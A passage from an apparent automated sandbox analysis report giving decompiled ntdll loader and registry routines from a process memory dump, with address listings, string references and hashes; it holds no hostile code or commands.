											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x50b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x50b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0500F380(_t136, 0x4fa1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04FE2280(_t108, 0x50b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04FF61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05099D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04FDFFB0(_t118, _t156, 0x50b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E05009A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x04fd8799
0x04fd879d
0x04fd87a1
0x04fd87a3
0x04fd87a8
0x04fd87c3
0x04fd87c3
0x04fd87c8
0x04fd87d1
0x04fd87d4
0x04fd87d8
0x04fd87e5
0x04fd87ec
0x05029bfe
0x05029c00
0x05029c02
0x05029c08
0x05029c0d
0x05029c0f
0x05029c14
0x05029c2d
0x05029c32
0x05029c37
0x05029c3a
0x05029c3c
0x05029c42
0x05029c42
0x05029c3c
0x05029c02
0x04fd87da
0x04fd87df
0x04fd87e3
0x00000000
0x00000000
0x04fd87e3
0x04fd87f2
0x00000000
0x04fd87fb
0x04fd87fd
0x04fd87fe
0x04fd880e
0x04fd880f
0x04fd8810
0x04fd8814
0x04fd881a
0x04fd881c
0x04fd881f
0x04fd8821
0x04fd8822
0x04fd8824
0x04fd8826
0x04fd882c
0x04fd882e
0x05029c48
0x05029c48
0x04fd8834
0x04fd8834
0x04fd8837
0x00000000
0x00000000
0x04fd8837
0x04fd882e
0x04fd883d
0x04fd8840
0x04fd8843
0x04fd8846
0x04fd8849
0x04fd884c
0x04fd884e
0x04fd8850
0x04fd8852
0x04fd8854
0x04fd8857
0x04fd88b4
0x04fd88b6
0x04fd88b6
0x04fd8859
0x04fd8859
0x04fd8859
0x04fd8861
0x04fd8866
0x04fd886a
0x04fd893d
0x04fd8941
0x00000000
0x04fd8947
0x04fd8947
0x04fd894a
0x04fd894c
0x00000000
0x04fd8952
0x04fd8955
0x04fd895a
0x04fd895d
0x04fd895d
0x04fd895f
0x04fd8961
0x04fd8961
0x04fd8968
0x00000000
0x00000000
0x04fd896a
0x04fd896b
0x04fd896e
0x00000000
0x04fd8970
0x04fd8970
0x04fd8970
0x04fd8970
0x04fd8972
0x04fd8972
0x04fd8974
0x00000000
0x04fd897a
0x04fd897a
0x04fd897d
0x00000000
0x04fd8983
0x05029c65
0x05029c6d
0x05029c72
0x05029c75
0x05029c75
0x05029c82
0x05029c86
0x05029c87
0x05029c88
0x05029c89
0x05029c8c
0x05029c90
0x05029c95
0x05029c97
0x05029ca0
0x05029ca3
0x05029ca9
0x05029ca9
0x00000000
0x05029ca9
0x05029ca3
0x00000000
0x05029c97
0x04fd897d
0x00000000
0x04fd8974
0x04fd8988
0x04fd8992
0x04fd8996
0x00000000
0x04fd8996
0x04fd894c
0x00000000
0x04fd8870
0x04fd887b
0x04fd887d
0x04fd887f
0x04fd8881
0x04fd8884
0x04fd8884
0x04fd8886
0x04fd8889
0x04fd888c
0x04fd888e
0x04fd8891
0x04fd8891
0x04fd8898
0x00000000
0x00000000
0x04fd889a
0x04fd889b
0x04fd889e
0x00000000
0x00000000
0x04fd88a0
0x04fd88a8
0x04fd88b0
0x04fd88b2
0x04fd88d3
0x04fd88d5
0x00000000
0x04fd88d7
0x04fd88db
0x04fd88dc
0x04fd88e0
0x04fd88e8
0x04fd88ee
0x04fd88f0
0x04fd88f3
0x04fd88fc
0x04fd8901
0x04fd8906
0x04fd890c
0x04fd890c
0x04fd890f
0x04fd8916
0x04fd8917
0x04fd8918
0x04fd8919
0x04fd891a
0x04fd891f
0x04fd8921
0x05029c52
0x05029c55
0x05029c5b
0x05029cac
0x05029cc0
0x05029cc0
0x05029c55
0x04fd8927
0x04fd8927
0x04fd892f
0x04fd8933
0x00000000
0x04fd88f5
0x04fd88f5
0x00000000
0x04fd88f7
0x04fd88f7
0x04fd88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x04fd88fa
0x04fd88f5
0x04fd88f3
0x00000000
0x04fd88d5
0x00000000
0x04fd88b2
0x04fd88c9
0x00000000
0x04fd88c9
0x04fd887f
0x04fd886a
0x04fd8857
0x04fd8852
0x04fd88bf
0x04fd88bf
0x04fd87aa
0x04fd87ad
0x04fd87ae
0x04fd87b4
0x04fd87b5
0x04fd87b6
0x04fd87b8
0x04fd87bd
0x04fd87c1
0x04fd87f4
0x04fd87fa
0x00000000
0x00000000
0x00000000
0x04fd87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 05029C1E
minkernel\ntdll\ldrsnap.c, xrefs: 05029C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 05029C18

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 40f2128fa92aee641dd6088bb9120863ba54d6a26614a19728f968894194c76d
Instruction ID: 070843e9c6be5978f741da500061886c82496abfa4cd3ea971f9745cf18ae267
Opcode Fuzzy Hash: 40f2128fa92aee641dd6088bb9120863ba54d6a26614a19728f968894194c76d
Instruction Fuzzy Hash: 2C91F371A00216DFEB18EF55D881ABE77BAFF44394F184169E855AB240EB30F942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04FD7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04FD7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04FDCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04FCC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x50b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05045510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x50b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04FE7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04FE7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05047016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04FE7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04FE7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05047016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04FFA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04FCB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x04fd7e4c
0x04fd7e50
0x04fd7e55
0x04fd7e58
0x04fd7e5d
0x04fd7e71
0x04fd7f33
0x04fd7e77
0x04fd7e77
0x04fd7e79
0x04fd7e79
0x04fd7e7e
0x04fd7f45
0x05029848
0x00000000
0x05029848
0x04fd7f4e
0x04fd7f53
0x04fd7f5a
0x00000000
0x00000000
0x0502985a
0x05029862
0x05029866
0x00000000
0x0502986c
0x00000000
0x0502986c
0x04fd7e84
0x04fd7e84
0x04fd7e8d
0x05029871
0x04fd7eb8
0x04fd7ec0
0x04fd7ec0
0x04fd7e9a
0x0502987e
0x00000000
0x00000000
0x05029884
0x0502988b
0x050298a7
0x050298ac
0x050298b1
0x050298b6
0x050298b8
0x050298b8
0x050298b9
0x00000000
0x050298b9
0x04fd7ea0
0x04fd7ea7
0x00000000
0x00000000
0x04fd7eac
0x04fd7eb1
0x04fd7ec6
0x04fd7ed0
0x050298cc
0x04fd7ed6
0x04fd7ed6
0x04fd7ed6
0x04fd7ede
0x04fd7ee3
0x050298e3
0x050298f0
0x05029902
0x050298f2
0x050298fb
0x050298fb
0x05029907
0x0502991d
0x0502991d
0x05029907
0x050298e3
0x04fd7ef0
0x04fd7f14
0x04fd7f14
0x04fd7f1e
0x05029946
0x04fd7f24
0x04fd7f24
0x04fd7f24
0x04fd7f2c
0x0502996a
0x05029975
0x05029975
0x0502997e
0x05029993
0x05029993
0x0502997e
0x00000000
0x04fd7ef2
0x04fd7efc
0x04fd7f0a
0x04fd7f0e
0x05029933
0x00000000
0x05029933
0x00000000
0x04fd7f0e
0x00000000
0x00000000
0x00000000
0x04fd7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 050298A2
LdrpCompleteMapModule, xrefs: 05029898
Could not validate the crypto signature for DLL %wZ, xrefs: 05029891

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 02f6c8df040d1fd77960547b25b102c68a23dba109dc51ba494232840f3dfd5d
Instruction ID: 7d292b7fe93ca4f32fcaea5c56e4543ae92422c72b620a4943a15a66066fba72
Opcode Fuzzy Hash: 02f6c8df040d1fd77960547b25b102c68a23dba109dc51ba494232840f3dfd5d
Instruction Fuzzy Hash: 8551F132B047459BE721EB68D944B6ABBE6FB00314F180AA9E8519F7D1D770FD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04FCE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04FCE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04FCF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E050095D0();
						}
						if(_t78 != 0) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0500FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0500BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E05009600();
					if(_t97 < 0) {
						goto L6;
					}
					E0500BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04FCF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0500BB40(_t83, _t102 + 0x24, _t78);
								if(L04FD43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0500BB40(_t84, _t102 + 0x24, _t94);
									if(L04FD43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x04fce620
0x04fce628
0x04fce62f
0x04fce631
0x04fce635
0x04fce637
0x04fce63e
0x05025503
0x05025503
0x04fce64c
0x04fce64c
0x04fce651
0x00000000
0x00000000
0x04fce661
0x04fce665
0x0502542a
0x04fce715
0x04fce71a
0x04fce71c
0x04fce720
0x04fce720
0x04fce727
0x04fce736
0x04fce736
0x04fce743
0x04fce743
0x04fce673
0x04fce678
0x04fce67d
0x04fce682
0x04fce685
0x04fce692
0x04fce69b
0x04fce6a3
0x04fce6ad
0x04fce6b1
0x04fce6b2
0x04fce6bb
0x04fce6bf
0x04fce6c0
0x04fce6c8
0x04fce6cc
0x04fce6d5
0x04fce6d9
0x00000000
0x00000000
0x04fce6e5
0x04fce6ea
0x04fce6f9
0x04fce70b
0x04fce70f
0x05025439
0x0502545e
0x0502545e
0x00000000
0x0502545e
0x0502543b
0x0502543e
0x05025440
0x05025445
0x05025472
0x05025475
0x0502548d
0x05025493
0x050254a9
0x00000000
0x00000000
0x050254ab
0x050254b4
0x050254bc
0x050254c8
0x050254de
0x050254fb
0x050254e0
0x050254e6
0x050254eb
0x050254eb
0x050254de
0x00000000
0x050254bc
0x05025477
0x0502547a
0x05025480
0x05025483
0x05025486
0x0502548b
0x00000000
0x00000000
0x00000000
0x0502548b
0x00000000
0x00000000
0x00000000
0x00000000
0x05025447
0x05025447
0x05025447
0x05025447
0x0502544e
0x00000000
0x00000000
0x05025450
0x05025452
0x05025455
0x0502545a
0x00000000
0x00000000
0x00000000
0x0502545c
0x0502546a
0x0502546d
0x0502546f
0x00000000
0x0502546f
0x04fce70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04FCE68C
@, xrefs: 04FCE6C0
InstallLanguageFallback, xrefs: 04FCE6DB

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 4d1c284622c90155eb9771099417aca34421bdd5543124e3e304aa26b168467b
Instruction ID: 47726fb3ec85bab51b1ff596bdc820a3e3e3537ca491398455500d9d16fc9d07
Opcode Fuzzy Hash: 4d1c284622c90155eb9771099417aca34421bdd5543124e3e304aa26b168467b
Instruction Fuzzy Hash: 0651B1725083569BD710DF24D844AAFB3E8BF98718F04092EF995DB240F734E905C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0508E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0508E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0508BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0508BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0508AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E05009730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0508A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0508A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E05009730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0508A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0508A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04FE2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E04FDB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E04FDFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04FE7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0507FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0508e547
0x0508e549
0x0508e54f
0x0508e553
0x0508e557
0x0508e55a
0x0508e55c
0x0508e55f
0x0508e561
0x0508e567
0x0508e56b
0x0508e7e2
0x00000000
0x0508e571
0x0508e575
0x0508e577
0x0508e57b
0x0508e57c
0x0508e57d
0x0508e57e
0x0508e57f
0x0508e588
0x0508e58f
0x0508e591
0x0508e592
0x0508e592
0x0508e596
0x0508e59e
0x0508e5a0
0x0508e5a6
0x0508e61d
0x0508e61d
0x0508e621
0x0508e623
0x0508e630
0x0508e630
0x0508e7e6
0x0508e7eb
0x0508e7ed
0x0508e7f4
0x0508e7fa
0x0508e7ff
0x0508e7ff
0x0508e80a
0x0508e812
0x0508e812
0x0508e5ab
0x0508e5b4
0x0508e5b9
0x0508e5be
0x0508e5c0
0x0508e5c2
0x0508e5c8
0x0508e5c9
0x0508e5cb
0x0508e5cc
0x0508e5d5
0x0508e5e4
0x0508e5f1
0x0508e5f8
0x0508e5f8
0x0508e5d5
0x0508e602
0x0508e616
0x0508e63d
0x0508e644
0x0508e64d
0x0508e652
0x0508e657
0x0508e659
0x0508e65b
0x0508e661
0x0508e662
0x0508e664
0x0508e665
0x0508e66e
0x0508e67d
0x0508e68a
0x0508e691
0x0508e691
0x0508e66e
0x0508e6b0
0x00000000
0x0508e6b6
0x0508e6bd
0x0508e6c7
0x0508e6d7
0x0508e6d9
0x0508e6db
0x0508e6de
0x0508e6e3
0x0508e6f3
0x0508e6fc
0x0508e700
0x0508e700
0x0508e704
0x0508e70a
0x0508e70a
0x0508e713
0x0508e716
0x0508e719
0x0508e720
0x0508e761
0x0508e76b
0x0508e774
0x0508e77a
0x0508e77a
0x0508e78a
0x0508e791
0x0508e799
0x0508e79b
0x0508e79f
0x0508e7aa
0x0508e7c0
0x0508e7ac
0x0508e7b2
0x0508e7b9
0x0508e7b9
0x0508e7c7
0x0508e806
0x00000000
0x0508e7c9
0x0508e7d1
0x0508e7d8
0x00000000
0x0508e7d8
0x00000000
0x00000000
0x0508e722
0x0508e72e
0x0508e748
0x0508e74c
0x0508e754
0x0508e756
0x0508e75c
0x0508e75c
0x00000000
0x0508e75c
0x0508e758
0x0508e758
0x00000000
0x0508e758
0x0508e750
0x00000000
0x00000000
0x0508e752
0x00000000
0x0508e752
0x0508e730
0x0508e735
0x0508e73d
0x0508e73f
0x00000000
0x00000000
0x0508e741
0x0508e741
0x00000000
0x0508e741
0x0508e739
0x00000000
0x00000000
0x0508e73b
0x00000000
0x0508e73b
0x0508e722
0x0508e720
0x0508e6b0
0x0508e618
0x00000000
0x0508e618

Strings

`, xrefs: 0508E5D7
`, xrefs: 0508E670

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 85ca0fe7c6c939b74d7f9def9b217b5b2e94501a34be55dff1504d3a706298b8
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 9E91AD312087429BE764EE25D944F6FB7EABF84714F14892DF5DACA280E770E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 050451BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E050451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
